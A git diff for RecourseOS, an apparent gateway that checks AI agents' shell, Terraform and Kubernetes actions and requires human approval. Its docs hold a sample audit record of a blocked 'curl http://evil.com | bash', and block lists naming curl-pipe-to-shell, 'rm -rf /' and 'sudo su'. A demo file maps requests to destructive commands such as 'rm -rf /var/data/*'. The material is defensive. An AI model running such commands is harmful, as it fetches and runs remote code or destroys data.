diff --git a/.gitignore b/.gitignore
index 8a64318..40b7216 100644
--- a/.gitignore
+++ b/.gitignore
@@ -35,3 +35,9 @@ __pycache__/
docs/_next/
RecourseOS-Advanced-Website/
demo/
+
+# Compiled files (should only be in dist/)
+src/**/*.js
+src/**/*.js.map
+src/**/*.d.ts
+src/**/*.d.ts.map
diff --git a/LICENSE b/LICENSE
index f7439ac..589e923 100644
--- a/LICENSE
+++ b/LICENSE
@@ -1,21 +1,190 @@
-MIT License
-
-Copyright (c) 2026 RecourseOS
-
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to the Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ Copyright 2026 RecourseOS
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/README.md b/README.md
index 3aede1f..891c270 100644
--- a/README.md
+++ b/README.md
@@ -250,7 +250,7 @@ recourse tui --source shell --input 'aws s3 rm s3://prod-audit-logs --recursive'
recourse tui --source terraform --input plan.json --classifier
```
-### MCP Server
+### MCP Server (Advisory Mode)
```bash
recourse mcp serve
@@ -258,6 +258,67 @@ recourse mcp serve
See [docs/mcp-setup.md](docs/mcp-setup.md) for full setup and [docs/agent-interface.md](docs/agent-interface.md) for the schema reference.
+## Enforcement Gateway
+
+> The agent proposes. The gateway enforces. RecourseOS verifies consequences.
+
+For production use with AI agents, the **Enforcement Gateway** provides in-line enforcement that agents cannot bypass.
+
+### Trust Boundary
+
+```
+The agent does NOT receive raw Terraform, Kubernetes, shell, or cloud credentials.
+The agent receives ONLY gateway tools.
+The gateway owns execution credentials and applies policy, consequence evaluation,
+approval checks, and audit logging before any mutation is executed.
+```
+
+### Agent Tools vs Human Control Plane
+
+| Agent-Callable (via MCP) | Human-Only (control plane) |
+|--------------------------|----------------------------|
+| `gateway_request_approval` | `approve` |
+| `gateway_check_approval` | `reject` |
+| `gateway_terraform_plan` | `break_glass` |
+| `gateway_terraform_apply` | `policy_override` |
+
+The agent can request and check approvals. Only humans can grant them.
+
+### Quick Start
+
+```bash
+# Start the gateway
+recourse gateway serve -e prod
+
+# Verify enforcement configuration
+recourse gateway doctor -e prod
+```
+
+Configure Claude Code/Cursor:
+
+```json
+{
+ "mcpServers": {
+ "recourse-gateway": {
+ "command": "npx",
+ "args": ["-y", "recourse-cli@latest", "gateway", "serve", "-e", "prod"]
+ }
+ }
+}
+```
+
+### Enforcement Guarantees
+
+| Guarantee | Mechanism |
+|-----------|-----------|
+| No credential leakage | Agent never sees raw credentials |
+| Plan integrity | Apply only works with verified plan hash |
+| Temporal bounds | Plans and approvals expire (1h / 24h) |
+| Audit completeness | All attempts recorded, including blocks |
+| Approval isolation | Agents cannot approve their own requests |
+
+See [docs/enforcement-gateway.md](docs/enforcement-gateway.md) for the full architecture.
+
### Shell Wrapper
Automatically check RecourseOS before dangerous shell commands execute. Add to your shell profile:
diff --git a/bin/recourseos-agent b/bin/recourseos-agent
new file mode 100755
index 0000000..ba776a8
--- /dev/null
+++ b/bin/recourseos-agent
@@ -0,0 +1,2 @@
+#!/usr/bin/env node
+import '../dist/agent-cli.js';
diff --git a/docs/enforcement-gateway.md b/docs/enforcement-gateway.md
new file mode 100644
index 0000000..da79212
--- /dev/null
+++ b/docs/enforcement-gateway.md
@@ -0,0 +1,256 @@
+# RecourseOS Enforcement Gateway
+
+> The agent proposes. The gateway enforces. RecourseOS verifies consequences.
+
+## Trust Boundary
+
+**Critical invariant:**
+
+```
+The agent does NOT receive raw Terraform, Kubernetes, shell, or cloud credentials.
+The agent receives ONLY gateway tools.
+The gateway owns execution credentials and applies policy, consequence evaluation,
+approval checks, and audit logging before any mutation is executed.
+```
+
+This is the single most important security property of the gateway architecture.
+
+## Tool Separation
+
+### Agent-Callable Tools (via MCP)
+
+These tools are exposed to agents through the gateway MCP server:
+
+| Tool | Purpose | Gate Behavior |
+|------|---------|---------------|
+| `gateway_terraform_plan` | Create evaluated plan, returns plan_id | Always allowed |
+| `gateway_terraform_apply` | Apply a plan by plan_id | Requires valid plan_id, approval if escalated |
+| `gateway_terraform_destroy` | Request destruction | Always escalates/blocks |
+| `gateway_kubectl_get` | Read K8s resources | Always allowed |
+| `gateway_kubectl_logs` | Read pod logs | Always allowed (secrets redacted) |
+| `gateway_kubectl_describe` | Describe K8s resources | Always allowed |
+| `gateway_kubectl_apply` | Apply manifest | Escalates for protected namespaces |
+| `gateway_kubectl_delete` | Delete resources | Always escalates |
+| `gateway_kubectl_scale` | Scale workloads | Escalates for scale-to-zero |
+| `gateway_kubectl_exec` | Exec into container | Always escalates |
+| `gateway_shell_exec` | Run shell command | Sandboxed with allow/block lists |
+| `gateway_request_approval` | Request human approval | Creates pending approval |
+| `gateway_check_approval` | Check approval status | Returns status only |
+| `gateway_get_plan` | Retrieve plan details | Read-only audit |
+
+### Human-Only Control Plane
+
+These actions are **never** exposed as MCP tools:
+
+- `approve` - Grant approval for escalated operations
+- `reject` - Deny approval requests
+- `break_glass` - Emergency override
+- `policy_override` - Modify gateway policy
+
+Approvals happen through the human control plane (Slack, web console, ServiceNow, SSO-authenticated API), not through agent tools.
+
+## Enforcement Model
+
+### Plan-Bound Terraform
+
+```
+1. Agent calls gateway_terraform_plan
+2. Gateway runs `terraform plan`, evaluates with RecourseOS
+3. Gateway stores plan with hash, workspace, TTL, decision
+4. Gateway returns plan_id to agent
+
+5. Agent calls gateway_terraform_apply with plan_id
+6. Gateway verifies:
+ - Plan exists
+ - Plan not expired
+ - Plan hash matches (no drift)
+ - Workspace matches
+ - Approval granted (if escalated)
+7. Only then: Gateway executes apply
+```
+
+### Protected Namespaces
+
+The following Kubernetes namespaces trigger escalation:
+
+- `kube-system`, `kube-public`
+- `cert-manager`, `ingress`, `istio-system`
+- `monitoring`, `security`, `vault`
+
+### Shell Sandbox
+
+| Category | Behavior | Examples |
+|----------|----------|----------|
+| **Allowed** | Execute immediately | `ls`, `cat`, `git status`, `kubectl get` |
+| **Escalate** | Requires approval | `rm`, `aws`, `terraform apply`, `helm` |
+| **Block** | Never execute | `curl\|bash`, `rm -rf /`, `sudo su` |
+
+### Environment Policy
+
+| Environment | Default Mutation | Destroy | kubectl exec |
+|-------------|------------------|---------|--------------|
+| dev | allow | escalate | escalate |
+| staging | warn | escalate | escalate |
+| prod | escalate | **block** | escalate |
+
+## Verification
+
+Run the gateway doctor to verify enforcement configuration:
+
+```bash
+recourse gateway doctor -e prod
+```
+
+Expected output:
+
+```
+RecourseOS Gateway Doctor
+Environment: prod
+
+Tool Exposure
+ ✓ gateway_approve not exposed
+ ✓ gateway_reject not exposed
+ ✓ raw terraform/kubectl tools not exposed
+
+Terraform Enforcement
+ ✓ Terraform apply requires plan_id
+ ✓ Terraform apply with unknown plan_id fails
+ ✓ Terraform destroy blocks in prod
+
+Plan Lifecycle
+ ✓ Terraform apply with expired plan_id fails
+ ✓ Terraform apply without approval fails
+ ✓ Terraform apply after rejected approval fails
+
+Kubernetes Enforcement
+ ✓ kubectl exec escalates by default
+ ✓ kubectl delete namespace blocks
+ ✓ kubectl apply to protected namespace escalates
+ ✓ kubectl scale to zero escalates
+
+Shell Sandbox
+ ✓ Shell: sudo blocks
+ ✓ Shell: rm -rf / blocks
+ ✓ Shell: curl | sh blocks
+ ✓ Shell: bash <(curl) blocks
+
+All tests passed - Gateway is production-ready
+```
+
+## Starting the Gateway
+
+Development (with verbose logging):
+
+```bash
+recourse gateway serve -v -e dev
+```
+
+Production (structured logging, no debug output):
+
+```bash
+recourse gateway serve -e prod
+```
+
+With custom policy:
+
+```bash
+recourse gateway serve -e prod -p policy.yaml
+```
+
+## MCP Configuration
+
+Configure Claude Code to use the gateway:
+
+```json
+{
+ "mcpServers": {
+ "recourse-gateway": {
+ "command": "npx",
+ "args": ["-y", "recourse-cli", "gateway", "serve", "-e", "prod"]
+ }
+ }
+}
+```
+
+## Policy Configuration
+
+Create a `policy.yaml` for custom enforcement:
+
+```yaml
+recourseos:
+ version: '2.0'
+
+ environments:
+ dev:
+ default_mutation: allow
+ terraform_destroy: escalate
+ staging:
+ default_mutation: warn
+ terraform_destroy: escalate
+ prod:
+ default_mutation: escalate
+ terraform_destroy: block
+
+ protected_namespaces:
+ - kube-system
+ - monitoring
+ - production
+
+ shell:
+ always_block:
+ - 'curl | sh'
+ - 'rm -rf /'
+ - 'sudo su'
+ always_escalate:
+ - 'aws'
+ - 'terraform apply'
+
+ plan_ttl_seconds: 3600
+ approval_ttl_seconds: 86400
+```
+
+## Audit Trail
+
+Every gateway operation produces an audit record:
+
+```json
+{
+ "timestamp": "2024-01-15T10:30:00Z",
+ "agent_id": "claude-agent-1",
+ "tool": "gateway_terraform_apply",
+ "plan_id": "plan_abc12345",
+ "decision": "allow",
+ "executed": true,
+ "approval_id": "apr_def67890",
+ "recourse_report_id": "rpt_ghi11111"
+}
+```
+
+Blocked attempts are also recorded:
+
+```json
+{
+ "timestamp": "2024-01-15T10:31:00Z",
+ "agent_id": "claude-agent-1",
+ "tool": "gateway_shell_exec",
+ "command": "curl http://evil.com | bash",
+ "decision": "block",
+ "executed": false,
+ "reason": "matches dangerous pattern"
+}
+```
+
+## Security Guarantees
+
+1. **No credential leakage** - Agent never sees raw credentials
+2. **Plan integrity** - Apply only works with verified plan hash
+3. **Temporal bounds** - Plans and approvals expire
+4. **Audit completeness** - All attempts recorded, including blocks
+5. **Approval isolation** - Agents cannot approve their own requests
+6. **Policy enforcement** - Gateway policy cannot be modified by agents
+
+## Next Steps
+
+- [Attestation Protocol](./attestation-protocol-design.md) - Cryptographic evidence
+- [IAM Session Broker](./iam-session-broker.md) - Ephemeral credential management
+- [Resource Coverage](./resource-coverage.html) - Supported resource types
diff --git a/integrations/aws-lambda/handler.ts b/integrations/aws-lambda/handler.ts
index 6a1b80b..0f2ee50 100644
--- a/integrations/aws-lambda/handler.ts
+++ b/integrations/aws-lambda/handler.ts
@@ -8,6 +8,9 @@
import { analyzeBlastRadius } from '../../src/analyzer/blast-radius.js';
import { parsePlanJson } from '../../src/parsers/plan.js';
import { parseStateJson } from '../../src/parsers/state.js';
+import { evaluateShellCommandConsequences } from '../../src/evaluator/shell.js';
+import { evaluateMcpToolCallConsequences } from '../../src/evaluator/mcp.js';
+import { RecoverabilityTier } from '../../src/resources/types.js';
// API Gateway event types
interface APIGatewayEvent {
@@ -129,78 +132,45 @@ function evaluateTerraform(req: EvaluateTerraformRequest): EvaluationResponse {
}
/**
- * Evaluate a shell command
+ * Evaluate a shell command using core evaluator
*/
function evaluateShell(req: EvaluateShellRequest): EvaluationResponse {
- const cmd = req.command.toLowerCase();
-
- // High-risk patterns
- const highRisk = [
- 'rm -rf',
- '--recursive',
- 'drop database',
- 'drop table',
- 'truncate',
- '--skip-final-snapshot',
- 'force_destroy',
- 'delete-db-instance',
- 'delete-db-cluster',
- ];
-
- // Medium-risk patterns
- const mediumRisk = [
- 'delete',
- 'remove',
- 'terminate',
- 'destroy',
- 'drop',
- 'kubectl delete',
- 'docker rm',
- 'docker rmi',
- ];
-
- let riskAssessment: RiskAssessment;
- let tier: number;
- let label: string;
- let reasoning: string;
+ const report = evaluateShellCommandConsequences(
+ { command: req.command, cwd: req.cwd },
+ {
+ adapterContext: {
+ actorId: req.actor,
+ environment: req.environment,
+ owner: req.owner,
+ },
+ }
+ );
- if (highRisk.some(p => cmd.includes(p))) {
- riskAssessment = 'block';
- tier = 4;
- label = 'unrecoverable';
- reasoning = 'Command matches high-risk destructive patterns';
- } else if (mediumRisk.some(p => cmd.includes(p))) {
- riskAssessment = 'escalate';
- tier = 3;
- label = 'needs-review';
- reasoning = 'Command appears destructive, requires confirmation';
- } else {
- riskAssessment = 'allow';
- tier = 1;
- label = 'reversible';
- reasoning = 'No destructive patterns detected';
- }
+ const worstTier = report.summary.worstRecoverability.tier;
+ const tierLabel = report.summary.worstRecoverability.label;
return {
- riskAssessment,
+ riskAssessment: report.riskAssessment,
summary: {
- totalChanges: 1,
- reversible: tier === 1 ? 1 : 0,
- recoverableWithEffort: 0,
- recoverableFromBackup: 0,
- needsReview: tier === 3 ? 1 : 0,
- unrecoverable: tier === 4 ? 1 : 0,
- hasUnrecoverable: tier === 4,
- worstTier: label,
+ totalChanges: report.summary.totalMutations,
+ reversible: worstTier === RecoverabilityTier.REVERSIBLE ? 1 : 0,
+ recoverableWithEffort: worstTier === RecoverabilityTier.RECOVERABLE_WITH_EFFORT ? 1 : 0,
+ recoverableFromBackup: worstTier === RecoverabilityTier.RECOVERABLE_FROM_BACKUP ? 1 : 0,
+ needsReview: report.summary.needsReview ? 1 : 0,
+ unrecoverable: report.summary.hasUnrecoverable ? 1 : 0,
+ hasUnrecoverable: report.summary.hasUnrecoverable,
+ worstTier: tierLabel,
},
- changes: [
- {
- address: req.command,
- action: 'execute',
- resourceType: 'shell_command',
- recoverability: { tier, label, reasoning },
+ changes: report.mutations.map(m => ({
+ address: m.intent.target.id || req.command,
+ action: m.intent.action,
+ resourceType: m.intent.target.type,
+ recoverability: {
+ tier: m.recoverability.tier,
+ label: m.recoverability.label,
+ reasoning: m.recoverability.reason,
},
- ],
+ })),
metadata: {
evaluatedAt: new Date().toISOString(),
actor: req.actor,
@@ -211,28 +181,26 @@ function evaluateShell(req: EvaluateShellRequest): EvaluationResponse {
}
/**
- * Evaluate an MCP tool call
+ * Evaluate an MCP tool call using core evaluator
*/
function evaluateMcp(req: EvaluateMcpRequest): EvaluationResponse {
- const toolLower = req.tool.toLowerCase();
- const destructivePatterns = ['delete', 'remove', 'destroy', 'terminate', 'drop'];
-
- let riskAssessment: RiskAssessment;
- let tier: number;
- let label: string;
- let reasoning: string;
+ const report = evaluateMcpToolCallConsequences(
+ {
+ server: req.server,
+ tool: req.tool,
+ arguments: req.arguments,
+ },
+ {
+ adapterContext: {
+ actorId: req.actor,
+ environment: req.environment,
+ owner: req.owner,
+ },
+ }
+ );
- if (destructivePatterns.some(p => toolLower.includes(p))) {
- riskAssessment = 'escalate';
- tier = 3;
- label = 'needs-review';
- reasoning = `Tool "${req.tool}" appears destructive`;
- } else {
- riskAssessment = 'allow';
- tier = 1;
- label = 'reversible';
- reasoning = 'No destructive patterns detected';
- }
+ const worstTier = report.summary.worstRecoverability.tier;
+ const tierLabel = report.summary.worstRecoverability.label;
const target =
req.arguments.bucket ||
@@ -241,25 +209,27 @@ function evaluateMcp(req: EvaluateMcpRequest): EvaluationResponse {
JSON.stringify(req.arguments);
return {
- riskAssessment,
+ riskAssessment: report.riskAssessment,
summary: {
- totalChanges: 1,
- reversible: tier === 1 ? 1 : 0,
- recoverableWithEffort: 0,
- recoverableFromBackup: 0,
- needsReview: tier === 3 ? 1 : 0,
- unrecoverable: 0,
- hasUnrecoverable: false,
- worstTier: label,
+ totalChanges: report.summary.totalMutations,
+ reversible: worstTier === RecoverabilityTier.REVERSIBLE ? 1 : 0,
+ recoverableWithEffort: worstTier === RecoverabilityTier.RECOVERABLE_WITH_EFFORT ? 1 : 0,
+ recoverableFromBackup: worstTier === RecoverabilityTier.RECOVERABLE_FROM_BACKUP ? 1 : 0,
+ needsReview: report.summary.needsReview ? 1 : 0,
+ unrecoverable: report.summary.hasUnrecoverable ? 1 : 0,
+ hasUnrecoverable: report.summary.hasUnrecoverable,
+ worstTier: tierLabel,
},
- changes: [
- {
- address: `${req.server}:${req.tool}(${target})`,
- action: 'call',
- resourceType: 'mcp_tool',
- recoverability: { tier, label, reasoning },
+ changes: report.mutations.map(m => ({
+ address: m.intent.target.id || `${req.server}:${req.tool}(${target})`,
+ action: m.intent.action,
+ resourceType: m.intent.target.type,
+ recoverability: {
+ tier: m.recoverability.tier,
+ label: m.recoverability.label,
+ reasoning: m.recoverability.reason,
},
- ],
+ })),
metadata: {
evaluatedAt: new Date().toISOString(),
actor: req.actor,
diff --git a/integrations/flowos-ui/examples/AgentDemo.tsx b/integrations/flowos-ui/examples/AgentDemo.tsx
new file mode 100644
index 0000000..5bdde6e
--- /dev/null
+++ b/integrations/flowos-ui/examples/AgentDemo.tsx
@@ -0,0 +1,580 @@
+/**
+ * Agent + RecourseOS Demo
+ *
+ * User talks to an AI agent. Agent tries to execute commands.
+ * RecourseOS intercepts dangerous actions. User approves/rejects.
+ *
+ * This is the real flow:
+ * 1. User: "Delete the staging RDS to save costs"
+ * 2. Agent interprets → aws rds delete-db-instance...
+ * 3. RecourseOS intercepts → ESCALATE
+ * 4. UI shows approval drawer
+ * 5. User approves/rejects
+ * 6. Agent continues or stops
+ */
+
+import * as React from 'react';
+import { useState, useCallback, useRef, useEffect } from 'react';
+
+const API_URL = 'http://localhost:3099';
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Types
+// ─────────────────────────────────────────────────────────────────────────────
+
+interface Message {
+ id: string;
+ role: 'user' | 'agent' | 'system';
+ content: string;
+ timestamp: Date;
+ pending?: boolean;
+ command?: string;
+ evaluation?: any;
+ status?: 'thinking' | 'executing' | 'waiting' | 'approved' | 'rejected' | 'completed';
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Agent Intent Mapping (simulates Claude Code understanding)
+// ─────────────────────────────────────────────────────────────────────────────
+
+interface AgentAction {
+ thought: string;
+ command: string;
+ dangerous: boolean;
+}
+
+function interpretUserIntent(input: string): AgentAction | null {
+ const lower = input.toLowerCase();
+
+ // RDS operations
+ if (lower.includes('delete') && (lower.includes('rds') || lower.includes('database') || lower.includes('db'))) {
+ const dbName = lower.includes('staging') ? 'staging-db' :
+ lower.includes('prod') ? 'prod-database' :
+ lower.includes('test') ? 'test-db' : 'my-database';
+ return {
+ thought: `I'll delete the ${dbName} RDS instance to help reduce costs.`,
+ command: `aws rds delete-db-instance --db-instance-identifier ${dbName} --skip-final-snapshot`,
+ dangerous: true,
+ };
+ }
+
+ // S3 operations
+ if (lower.includes('delete') && (lower.includes('s3') || lower.includes('bucket'))) {
+ const bucket = lower.includes('backup') ? 'old-backups' :
+ lower.includes('log') ? 'application-logs' :
+ lower.includes('data') ? 'customer-data' : 'my-bucket';
+ return {
+ thought: `I'll delete the ${bucket} S3 bucket.`,
+ command: `aws s3 rb s3://${bucket} --force`,
+ dangerous: true,
+ };
+ }
+
+ // EC2 operations
+ if (lower.includes('terminate') && (lower.includes('ec2') || lower.includes('instance') || lower.includes('server'))) {
+ return {
+ thought: "I'll terminate the EC2 instance.",
+ command: 'aws ec2 terminate-instances --instance-ids i-0123456789abcdef0',
+ dangerous: true,
+ };
+ }
+
+ // Kubernetes operations
+ if (lower.includes('delete') && (lower.includes('deploy') || lower.includes('kubernetes') || lower.includes('k8s') || lower.includes('pod'))) {
+ const resource = lower.includes('api') ? 'api-server' : 'web-frontend';
+ return {
+ thought: `I'll delete the ${resource} deployment from Kubernetes.`,
+ command: `kubectl delete deployment ${resource} -n production`,
+ dangerous: true,
+ };
+ }
+
+ // Docker operations
+ if (lower.includes('remove') && lower.includes('container')) {
+ return {
+ thought: "I'll remove all Docker containers.",
+ command: 'docker rm -f $(docker ps -aq)',
+ dangerous: true,
+ };
+ }
+
+ // File operations
+ if ((lower.includes('delete') || lower.includes('remove') || lower.includes('rm')) &&
+ (lower.includes('file') || lower.includes('folder') || lower.includes('directory') || lower.includes('data'))) {
+ const path = lower.includes('log') ? '/var/log/*' :
+ lower.includes('temp') ? '/tmp/*' :
+ lower.includes('data') ? '/var/data/*' : '/app/data/*';
+ return {
+ thought: `I'll remove the files at ${path}.`,
+ command: `rm -rf ${path}`,
+ dangerous: true,
+ };
+ }
+
+ // Safe operations - list/describe/get
+ if (lower.includes('list') || lower.includes('show') || lower.includes('describe') || lower.includes('get')) {
+ if (lower.includes('s3') || lower.includes('bucket')) {
+ return {
+ thought: "I'll list the S3 buckets.",
+ command: 'aws s3 ls',
+ dangerous: false,
+ };
+ }
+ if (lower.includes('ec2') || lower.includes('instance')) {
+ return {
+ thought: "I'll describe the EC2 instances.",
+ command: 'aws ec2 describe-instances',
+ dangerous: false,
+ };
+ }
+ if (lower.includes('pod') || lower.includes('kubernetes')) {
+ return {
+ thought: "I'll list the Kubernetes pods.",
+ command: 'kubectl get pods -A',
+ dangerous: false,
+ };
+ }
+ }
+
+ return null;
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// API
+// ─────────────────────────────────────────────────────────────────────────────
+
+async function evaluateCommand(command: string) {
+ const res = await fetch(`${API_URL}/evaluate`, {
+ method: 'POST',
+ headers: { 'Content-Type': 'application/json' },
+ body: JSON.stringify({ intent: { source: 'shell', command }, description: command }),
+ });
+ return res.json();
+}
+
+async function approveEvaluation(id: string) {
+ await fetch(`${API_URL}/approve/${id}`, { method: 'POST' });
+}
+
+async function rejectEvaluation(id: string) {
+ await fetch(`${API_URL}/reject/${id}`, { method: 'POST' });
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Components
+// ─────────────────────────────────────────────────────────────────────────────
+
+function MessageBubble({ message }: { message: Message }) {
+ const isUser = message.role === 'user';
+ const isSystem = message.role === 'system';
+
+ return (
+
+
+ {!isUser && !isSystem && (
+
+ Claude Code
+
+ )}
+
{message.content}
+
+ {/* Show command being executed */}
+ {message.command && (
+